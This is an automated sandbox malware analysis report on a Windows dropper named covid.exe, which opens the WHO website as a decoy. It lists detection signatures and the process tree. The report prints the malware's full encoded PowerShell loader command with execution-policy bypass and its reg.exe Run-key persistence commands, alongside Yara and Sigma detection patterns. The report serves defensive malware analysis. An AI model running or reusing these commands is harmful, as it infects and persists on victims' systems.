Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report covid.exe

Overview

General Information

Sample Name:covid.exe
Analysis ID:379751
MD5:a990c03d14bef241e880d6167fa5a6aa
SHA1:210c7bed3182e3113b9a20816ced2f9c2ad6f86a
SHA256:9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Encoded PowerShell Command Line
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Powershell Load Encrypted Assembly
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • covid.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: A990C03D14BEF241E880D6167FA5A6AA)
    • powershell.exe (PID: 5720 cmdline: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • iexplore.exe (PID: 4168 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/ MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 5956 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • reg.exe (PID: 6616 cmdline: 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 6644 cmdline: 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • buyonegetone.exe (PID: 6748 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
        • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mobsync.exe (PID: 6888 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
          • WerFault.exe (PID: 7016 cmdline: C:\Windows\system32\WerFault.exe -u -p 6888 -s 640 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 7120 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 6224 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
      • WerFault.exe (PID: 4464 cmdline: C:\Windows\system32\WerFault.exe -u -p 6224 -s 636 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 4244 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 5504 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
      • WerFault.exe (PID: 5108 cmdline: C:\Windows\system32\WerFault.exe -u -p 5504 -s 404 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 5172 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 5240 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x15e:$sa2: -encodedcommand
  • 0x13b:$sc2: -noprofile
  • 0x146:$se3: -executionpolicy bypass
  • 0x136:$sf1: -sta
C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txtJoeSecurity_PowershellLoadEncryptedAssemblyYara detected Powershell Load Encrypted AssemblyJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0x3fa3:$sa2: -encodedcommand
    • 0x3f80:$sc2: -noprofile
    • 0x3f8b:$se3: -executionpolicy bypass
    • 0x3f7b:$sf1: -sta

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
    Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A, CommandLine: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A,

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: covid.exeAvira: detected
    Multi AV Scanner detection for submitted fileShow sources
    Source: covid.exeVirustotal: Detection: 15%Perma Link
    Source: covid.exeReversingLabs: Detection: 34%
    Source: 0.0.covid.exe.c70000.0.unpackAvira: Label: TR/Dropper.Gen2
    Source: covid.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
    Source: unknownHTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2
    Source: covid.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605D1B8 FindFirstFileExW,13_2_00007FF68605D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11D1B8 FindFirstFileExW,18_2_00007FF6FE11D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW,29_2_00007FF7E3D7D1B8

    Networking:

    barindex
    Potential dropper URLs found in powershell memoryShow sources
    Source: powershell.exe, 00000001.00000002.281304560.000001A414536000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatarame
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory:
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
    Source: Joe Sandbox ViewIP Address: 23.111.9.35 23.111.9.35
    Source: Joe Sandbox ViewIP Address: 23.111.9.35 23.111.9.35
    Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
    Source: base[1].js.7.drString found in binary or memory: "s.youtube.com"===t&&(t=OD(this.va)||"www.youtube.com")):t="video.google.com";this.Qj=t;PD(this,a,!0);this.L=new XC;g.H(this,this.L);t=b?b.innertubeApiKey:tD("",a.innertube_api_key);r=b?b.innertubeApiVersion:tD("",a.innertube_api_version);p=b?b.innertubeContextClientVersion:tD("",a.innertube_context_client_version);this.Mf={innertubeApiKey:uo("INNERTUBE_API_KEY")||t,innertubeApiVersion:uo("INNERTUBE_API_VERSION")||r,cH:g.M("INNERTUBE_CONTEXT_CLIENT_CONFIG_INFO"),dH:this.deviceParams.c,innertubeContextClientVersion:uo("INNERTUBE_CONTEXT_CLIENT_VERSION")|| equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: (g.Km(b,"www.youtube.com"),c=b.toString()):c=mw(c);b=new Dy(c);b.set("cmo=pf","1");d&&b.set("cmo=td","a1.googlevideo.com");return b}; equals www.youtube.com (Youtube)
    Source: FL794448.htm.7.drString found in binary or memory: <iframe width="560" height="315" src="https://www.youtube.com/embed/yEIPefMsf70" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen title="WHO: A global response to a global pandemic"></iframe> equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: Mga=function(a,b){if(!a.i["0"]){var c=new lB("0","fakesb",void 0,new hB(0,0,0,void 0,void 0,"auto"),null,null,1);a.i["0"]=b?new tA(new Dy("http://www.youtube.com/videoplayback"),c,"fake"):new dB(new Dy("http://www.youtube.com/videoplayback"),c,new aA(0,0),new aA(0,0),0,NaN)}}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.YD=function(a){a=OD(a.va);return"www.youtube-nocookie.com"===a?"www.youtube.com":a}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.k.clone=function(){var a=new Om;a.u=this.u;this.i&&(a.i=this.i.clone(),a.l=this.l);return a};var Vm="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),vda=/\bocr\b/;var wda=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;var UD={f_:"LIVING_ROOM_APP_MODE_UNSPECIFIED",c_:"LIVING_ROOM_APP_MODE_MAIN",b_:"LIVING_ROOM_APP_MODE_KIDS",d_:"LIVING_ROOM_APP_MODE_MUSIC",e_:"LIVING_ROOM_APP_MODE_UNPLUGGED",a_:"LIVING_ROOM_APP_MODE_GAMING"};Ym.prototype.set=function(a,b){b=void 0===b?!0:b;0<=a&&52>a&&0===a%1&&this.i[a]!=b&&(this.i[a]=b,this.l=-1)}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.k.getVideoUrl=function(a,b,c,d,e){b={list:b};c&&(e?b.time_continue=c:b.t=c);c=g.ZD(this);d&&"www.youtube.com"===c?d="https://youtu.be/"+a:g.JD(this)?(d="https://"+c+"/fire",b.v=a):(d=this.protocol+"://"+c+"/watch",b.v=a,nq&&(a=Ap())&&(b.ebc=a));return g.Id(d,b)}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.oE=function(a){var b=g.ZD(a);!a.ea("yt_embeds_disable_new_error_lozenge_url")&&kha.includes(b)&&(b="www.youtube.com");return a.protocol+"://"+b}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.yM.prototype.l=function(a){var b=this;$na(this);var c=a.wA,d=this.api.T();"GENERIC_WITHOUT_LINK"!==c||d.I?"TOO_MANY_REQUESTS"===c?(d=this.api.getVideoData(),this.bd(BM(this,"TOO_MANY_REQUESTS_WITH_LINK",d.Vm(),void 0,void 0,void 0,!1))):"HTML5_NO_AVAILABLE_FORMATS_FALLBACK"!==c||d.I?this.bd(g.zM(a.errorMessage)):this.bd(BM(this,"HTML5_NO_AVAILABLE_FORMATS_FALLBACK_WITH_LINK_SHORT","//www.youtube.com/supported_browsers")):(a=d.hostLanguage,c="//support.google.com/youtube/?p=player_error1",a&&(c= equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: gia(this.videoData),this.V("highrepfallback");else if(a.i){b=this.l?this.l.l.l:null;if(Rva(a)&&b&&b.isLocked())var d="FORMAT_UNAVAILABLE";else if(!this.i.I&&"auth"===a.errorCode&&"429"===a.details.rc){d="TOO_MANY_REQUESTS";var e="6"}this.V("playererror",a.errorCode,d,g.KB(a.details),e)}else d=/^pp/.test(this.videoData.clientPlaybackNonce),oU(this,a.errorCode,a.details),d&&"manifest.net.connect"===a.errorCode&&(a="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+ equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: h,l,"Trusted Ad Domain URL");this.Da=U(!1,a.privembed);this.protocol=0===this.Gc.indexOf("http:")?"http":"https";this.va=hw((b?b.customBaseYoutubeUrl:a.BASE_YT_URL)||"")||hw(this.Gc)||this.protocol+"://www.youtube.com/";l=b?b.eventLabel:a.el;h="detailpage";"adunit"===l?h=this.l?"embedded":"detailpage":"embedded"===l||this.u?h=rD(h,l,hha):l&&(h="embedded");this.Ca=h;xp();l=null;h=b?b.playerStyle:a.ps;var m=g.fb(xD,h);!h||m&&!this.u||(l=h);this.playerStyle=l;this.J=(this.I=g.fb(xD,this.playerStyle))&& equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: oJ.prototype.replace=function(a,b){a=g.q(a);for(var c=a.next();!c.done;c=a.next())delete this.i[c.value.encryptedTokenJarContents];kka(this,b)};pJ.prototype.Zo=function(a){var b,c,d=null===(b=a.responseContext)||void 0===b?void 0:b.locationPlayabilityToken;void 0!==d&&(this.locationPlayabilityToken=d,this.i=void 0,"TVHTML5"===(null===(c=a.responseContext)||void 0===c?void 0:c.clientName)?(this.localStorage=lka(this))&&this.localStorage.set("yt-location-playability-token",d,15552E3):g.Sq("YT_CL",JSON.stringify({t6:d}),15552E3,void 0,!0))};var sJ;g.v(rJ,Mr);rJ.prototype.ow=function(a,b){a=Mr.prototype.ow.call(this,a,b);return Object.assign(Object.assign({},a),this.i)};var Bka=/[&\?]action_proxy=1/,Aka=/[&\?]token=([\w-]*)/,Cka=/[&\?]video_id=([\w-]*)/,Dka=/[&\?]index=([\d-]*)/,Eka=/[&\?]m_pos_ms=([\d-]*)/,Hka=/[&\?]vvt=([\w-]*)/,vka="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),Fka="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),xka={android:"ANDROID", equals www.youtube.com (Youtube)
    Source: unknownDNS traffic detected: queries for: www.who.int
    Source: mobsync.exe, mobsync.exe, 00000014.00000002.340204624.0000023F81490000.00000040.00000001.sdmpString found in binary or memory: http://code.jquery.com/
    Source: powershell.exe, 00000001.00000002.292130964.000001A42AF59000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: fa-regular-400[1].eot.7.drString found in binary or memory: http://fontello.com
    Source: fa-regular-400[1].eot.7.drString found in binary or memory: http://fontello.comFont
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: FL794448.htm.7.drString found in binary or memory: http://schema.org
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000001.00000002.265257231.000001A412EE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: msapplication.xml.6.drString found in binary or memory: http://www.amazon.com/
    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: FL794448.htm.7.drString found in binary or memory: http://www.emro.who.int/index.html
    Source: FL794448.htm.7.drString found in binary or memory: http://www.euro.who.int/en/home
    Source: msapplication.xml2.6.drString found in binary or memory: http://www.live.com/
    Source: msapplication.xml6.6.drString found in binary or memory: http://www.wikipedia.com/
    Source: base[1].js.7.drString found in binary or memory: http://www.youtube.com/videoplayback
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/drm/2012/10/10
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/streaming/metadata/segment/102015
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/streaming/otf/durations/112015
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/yt/2012/10/10
    Source: base[1].js.7.drString found in binary or memory: https://admin.youtube.com
    Source: analytics[1].js.7.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
    Source: FL794448.htm.7.drString found in binary or memory: https://app.powerbi.com/
    Source: FL794448.htm.7.drString found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpg
    Source: FL794448.htm.7.drString found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_interactive-timeline.tmb-479v.pn
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
    Source: FL794448.htm.7.drString found in binary or memory: https://covid19.who.int/
